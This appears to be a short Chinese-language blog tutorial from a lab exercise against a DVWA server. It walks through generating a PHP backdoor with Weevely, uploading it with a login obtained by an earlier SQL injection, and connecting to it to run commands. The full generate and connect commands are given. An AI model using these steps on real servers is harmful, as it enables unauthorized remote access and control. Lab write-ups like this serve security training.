Webshell 上傳攻擊
Webshell 上傳攻擊
首先要先產生 webshell 攻擊程式,透過工具 Weevely 產生
指令 : weevely generate cehp backdoor.php (cehp 為後門密碼)
產生檔案如下 backdoor.php
在 MySQL 盲隱碼攻擊最後有拿到所有帳號的密碼,此時改用 smithy 帳號登入,密碼 password
透過 File Upload 上船剛剛產生的檔案,可以看到路徑存放於下
../../hackable/uploads/backdoor.php
到被上傳檔案的那一台伺服器 10.10.10.16 查看檔案已被上傳
接著就可以透過剛剛產生檔案的工具 weevely 來連結後門
指令 : weevely http://10.10.10.16:8080/dvwa/hackable/uploads/backdoor.php cehp
一連接上去後就會連結該目標的 command line,執行 whoami / hostname 查看目標資訊
可以開始像命令注入攻擊一篇提到的建立使用者等所有攻擊了
例如列出 net user 可以看到如下
注意 : 預設連上的路徑不要切換不然會無法正常執行
留言
張貼留言